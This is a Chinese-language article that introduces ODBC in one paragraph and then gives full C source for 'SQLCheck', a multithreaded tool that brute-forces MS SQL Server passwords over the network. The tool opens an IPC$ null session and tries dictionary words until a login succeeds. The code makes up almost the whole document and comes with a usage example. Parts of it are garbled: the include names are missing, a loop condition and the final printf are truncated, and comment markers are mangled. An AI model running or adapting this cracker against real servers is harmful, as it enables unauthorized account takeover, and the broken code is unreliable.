ODBC是开放数据互连(Open Database Connectivity)的简称，它是一个用于远程访问数据
库（主要是关系型数据库）的统一界面标准。　　ODBC下现实运用中是一个数据库的访问库，
它提供了一组ODBC API函数可以提供给编程者使用。对于程序员来说，ODBC API函数集实际上
等于一个动态连接库(DLL)集，可以在应用程序中直接使用它们。
　　 一个应用程序直接调用ODBC API函数来进行数据库的应用工作，工作过程一般比较复杂。
其中一种办法大概是以下几步：
　　 <1>启动ODBC数据库应用程序。
　　 下面以一个实例来说明远程检测MS SQL Server账号密码的全过程。
　　 /**********************************************************
　　 Module Name:SQLCheck.c
　　 Date:2000.12.14
　　 WEB:www.patching.net
　　 Notices:Copyright(c) eyas
　　 **********************************************************/
　　 #include
　　 #include
　　 #include
　　 #include
　　 #include
　　 #include
　　 #include
　　 #include
　　 ////////////////////////////////////////////////////////////////////////
　　 file://定义全局变量
　　 char dict[20000][40],//密码字典
　　 UserName[40],//用户名
　　 target[40],//目标服务器
　　 passwd[40];//已经探测出来的正确密码
　　 int total=0;//字典里面单词数量
　　 BOOL Cracked=FALSE;//探测密码成功时此值为TRUE
　　 HANDLE hSemaphore,//信标内核对象
　　 hEvent;//事件内核对象
　　 long MaxThreads,//最大线程数量
　　 ActiveThreads;//活动线程数量
　　 ////////////////////////////////////////////////////////////////////////
　　 void usage(char *pragname)
　　 {
　　 printf(" Power by eyas"
　　 " http://www.patching.net"
　　 " 2000/12/14"
　　 " Usage:%s "
　　 " Example:%s 192.168.0.1 sa c:\pwd.dic 50 ",pragname,pragname);
　　 return;
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 int ReadDic(char *dic)
　　 {
　　 FILE *fp;
　　 char tmp[40];
　　 file://打开字典文件
　　 if((fp=fopen(dic,"r"))==NULL)
　　 {
　　 printf(" Can't open %s",dic);
　　 return 1;
　　 }
　　 while(!feof(fp))
　　 {
　　 file://读取数据到临时变量
　　 if(fgets(tmp,40,fp)==NULL)
　　 break;
　　 file://把从文件里面读出来的最后一位数据[换行符号]去掉
　　 strncpy(dict[total],tmp,strlen(tmp)-1);
　　 total++; 　　if(total>=19999)
　　 break;
　　 }
　　 fclose(fp);
　　 return 0;
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 int ConnIPC(char *RemoteName)
　　 {
　　 NETRESOURCE nr;
　　 DWORD flags=CONNECT_UPDATE_PROFILE;
　　 TCHAR RN[30]="\\",
　　 LN[5]="";
　　 strcat(RN,RemoteName);
　　 strcat(RN,"\ipc$");
　　 nr.dwType=RESOURCETYPE_DISK;
　　 nr.lpLocalName=(LPTSTR)&LN;
　　 nr.lpRemoteName=(LPTSTR)&RN;
　　 nr.lpProvider=NULL;
　　 if(WNetAddConnection2(&nr,(LPSTR)"",(LPSTR)"",flags)==NO_ERROR)
　　 {
　　 return 0;
　　 }
　　 else
　　 {
　　 return 1;
　　 }
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 int DelIPC(char *RemoteName)
　　 {
　　 DWORD ret;
　　 TCHAR lpName[30]="\\";
　　 strcat(lpName,RemoteName);
　　 strcat(lpName,"\ipc$");
　　 ret=WNetCancelConnection2(lpName,CONNECT_UPDATE_PROFILE,TRUE);
　　 if(ret==NO_ERROR)
　　 {
　　 return 0;
　　 }
　　 else
　　 {
　　 return 1;
　　 }
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 DWORD WINAPI SQLCheck(PVOID pPwd)
　　 {
　　 file://定义局部变量
　　 char szBuffer[1025];
　　 char *pwd;
　　 SWORD swStrLen;
　　 SQLHDBC hdbc;
　　 SQLHANDLE henv;
　　 SQLRETURN retcode;//ODBC API运行返回值
　　 SCHAR ConnStr[200];//连接数据库字符串
　　 long PreviousCount;
　　 file://取得传递过来准备探测的密码
　　 pwd=(char *)pPwd;
　　 file://构造连接数据库字符
　　 sprintf(ConnStr,"DRIVER={SQL Server};SERVER=%s;UID=%s;PWD=%s;DATABASE=master",
　　 target,UserName,pwd);
　　 file://puts(ConnStr);
　　 __try{
　　 file://创建数据库应用的环境句柄
　　 if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=SQL_SUCCESS)
　　 {
　　 printf(" Allocate environment handle failed. ");
　　 ExitProcess(1);
　　 }
　　 file://设置ODBC版本环境
　　 if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
　　 SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
　　 {
　　 printf(" Set the ODBC version environment attribute failed. ");
　　 SQLFreeHandle(SQL_HANDLE_ENV, henv);
　　 ExitProcess(1);
　　 }
　　 file://创建连接句柄
　　 if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
　　 *)&hdbc)) != SQL_SUCCESS)
　　 {
　　 printf(" Allocate connection handle failed. ");
　　 SQLFreeHandle(SQL_HANDLE_ENV, henv);
　　 ExitProcess(1);
　　 }
　　 file://连接数据源
　　 retcode= SQLDriverConnect(hdbc,NULL,ConnStr,strlen(ConnStr),
　　 szBuffer,sizeof(szBuffer),&swStrLen,
　　 SQL_DRIVER_COMPLETE_REQUIRED);
　　 if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO)
　　 {
　　 file://连接失败，函数终止
　　 file://printf(" Couldn't connect to %s MSSQL server. ",target);
　　 }
　　 else
　　 {
　　 file://连接远程MSSQL Server数据库成功
　　 Cracked=TRUE;
　　 strncpy(passwd,pwd,sizeof(passwd));
　　 file://断开连接
　　 SQLDisconnect(hdbc);
　　 }
　　 }//end of tyr
　　 __finally{
　　 file://释放连接句柄
　　 SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
　　 file://释放环境句柄
　　 SQLFreeHandle(SQL_HANDLE_ENV, henv);
　　 file://对信标当前资源数量进行递增1，并取得当前资源数量的原始值
　　 ReleaseSemaphore(hSemaphore,1,&PreviousCount);
　　 file://计算当前活动线程数量
　　 ActiveThreads=MaxThreads-PreviousCount-1;
　　 file://printf(" ActiveThreads-->%d.",ActiveThreads);
　　 file://如果活动线程数量为0,那么将事件内核对象hEvent改为已通知状态，程序结束
　　 if(ActiveThreads==0)
　　 {
　　 SetEvent(hEvent);
　　 }
　　 }//end of finally
　　 return 0;
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 int main(int argc,char **argv)
　　 {
　　 HANDLE hThread;//线程句柄
　　 DWORD dwThreadId,dwRet;
　　 int i=0,err=0;
　　 clock_t start,end;//程序运行的起始和结束时间
　　 double duration;
　　 if(argc!=5)
　　 {
　　 usage(argv[0]);
　　 return 1;
　　 }
　　 file://取得目标地址，用户名
　　 strncpy(target,argv[1],sizeof(target));
　　 strncpy(UserName,argv[2],sizeof(UserName));
　　 file://取得并检查用户输入的最大线程数量
　　 MaxThreads=atol(argv[4]); 　　if((MaxThreads>100) || (MaxThreads<1))
　　 {
　　 usage(argv[0]);
　　 return 1;
　　 }
　　 file://读取字典中的单词到内存中
　　 if(ReadDic(argv[3])!=0)
　　 return 1;
　　 file://与目标机器建立IPC Session
　　 if(ConnIPC(argv[1])!=0)
　　 {
　　 printf(" Can't built IPC NULL Session!");
　　 return 1;
　　 }
　　 else
　　 {
　　 printf(" Built IPC NULL Session success! ");

　　}
　　 file://创建信标内核对象,最大资源数量和可以使用的资源数量均为MaxThreads
　　 hSemaphore=CreateSemaphore(NULL,MaxThreads,MaxThreads,NULL);
　　 if(hSemaphore==NULL)
　　 {
　　 printf(" CreateSemaphore() failed.ErrorCode:%d.",GetLastError());
　　 return 1;
　　 }
　　 file://创建事件内核对象[人工重置，初始状态为未通知]
　　 hEvent=CreateEvent(NULL,TRUE,FALSE,NULL);

　　if(hEvent==NULL)
　　 {
　　 printf(" CreateEvent() failed.ErrorCode:%d.",GetLastError());
　　 CloseHandle(hSemaphore);
　　 return 1;
　　 }
　　 file://开始计时
　　 start=clock();
　　 file://开始建立线程探测密码
　　 for(i=0;i {
　　 file://探测密码成功后跳出此循环
　　 if(Cracked==TRUE)
　　 break;
　　 file://显示进度信息 　　printf(" [%d/%d] %s -> %s -> %s",i+1,total,target,UserName,dict[i]);
　　 file://创建线程
　　 hThread=CreateThread(NULL,0,SQLCheck,(PVOID)&dict[i],0,&dwThreadId);
　　 file://处理创建线程错误的情况
　　 if(hThread==NULL)
　　 {
　　 err++;
　　 MessageBox(NULL,"thread error","error",MB_OK);

　　break;
　　 }
　　 CloseHandle(hThread);
　　 Sleep(10);
　　 file://等待信标内核对象通知，可用资源数量大于0则继续创建线程，等于0则线程进入
　　 WaitForSingleObject(hSemaphore,INFINITE);

　　}
　　 file://等待事件内核对象通知,最多等待3分钟
　　 dwRet=WaitForSingleObject(hEvent,180000);
　　 switch(dwRet)
　　 {
　　 case WAIT_OBJECT_0:
　　 printf(" All thread done.");
　　 break;
　　 case WAIT_TIMEOUT:
　　 printf(" Wait time out.Exit.");
　　 break;
　　 case WAIT_FAILED:
　　 printf(" WaitForSingleObject() failed.");

　　break;
　　 }
　　 file://断开与目标机器的IPC Session
　　 DelIPC(target);
　　 file://探测密码成功后回显信息
　　 if(Cracked==TRUE)
　　 printf(" Success!%s SQL Server User [%s] passwd is [%s].",tar
　　 file://记时结束
　　 end=clock();
　　 file://转换时间格式
　　 duration = (double)(end - start) / CLOCKS_PER_SEC;
　　 file://显示所用时间
　　 printf(" Complete.Use %2.1f seconds. ",duration);
　　 return 0;
　　 }
　　 ////////////////////////////////////////////////////////////////////////
　　 程序在windows2000,vc++6.0环境下编译通过。